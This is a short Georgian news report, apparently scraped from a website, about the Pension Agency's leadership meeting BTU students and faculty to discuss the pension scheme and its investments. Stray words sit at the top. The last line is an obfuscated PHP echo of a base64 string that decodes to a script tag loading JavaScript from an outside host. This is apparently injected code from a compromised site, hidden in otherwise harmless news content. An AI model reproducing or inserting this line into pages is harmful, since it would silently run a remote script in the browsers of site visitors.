celsiusi
ავერსი შნაიდერი
საპენსიო სააგენტოს და ბიზნესისა და ტექნოლოგიების უნივერსიტეტის ერთობლივი ინიციატივით საპენსიო სააგენტოს დირექტორი გიორგი დანელია და უფროსი საინვესტიციო ოფიცერი გოგა მელიქიძე საინვესტიციო პროცესებზე სასაუბროდ BTU-ს უნივერსიტეტის სტუდენტებსა და პროფესორ-მასწავლებლებს შეხვდნენ. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს საპენსიო სააგენტოდან აცნობეს. 
 
მათივე ინფორმაციით, საპენსიო სააგენტოს წარმომადგენლებმა მოწვეულ სტუმრებს გააცნეს საპენსიო სააგენტოს სქემა, დეტალურად ისაუბრეს საინვესტიციო მანდატზე, მიმდინარე ინვესტიციებზე, საერთაშორისო ბაზრების მოთხოვნებზე და საქართველოში არსებულ რესურსებზე. ყურადღება გამახვილდა არსებულ სტატისტიკურ მონაცემებზე, სქემის მოსარგებლეებზე, დამზოგველების შემდგომ პერსპექტივასა და მსოფლიო პრაქტიკაზე. 
 
შეხვედრა, ტრადიციულად არაფორმალურ რეჟიმში წარიმართა, დასმულ შეკითხვებს მიწვეული სტუმრები პასუხობდნენ. მსგავს შეხვედრებს, საქართველოს სხვადასხვა უნივერსიტეტში საპენსიო სააგენტო მომავალშიც გეგმავს.
 
672
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");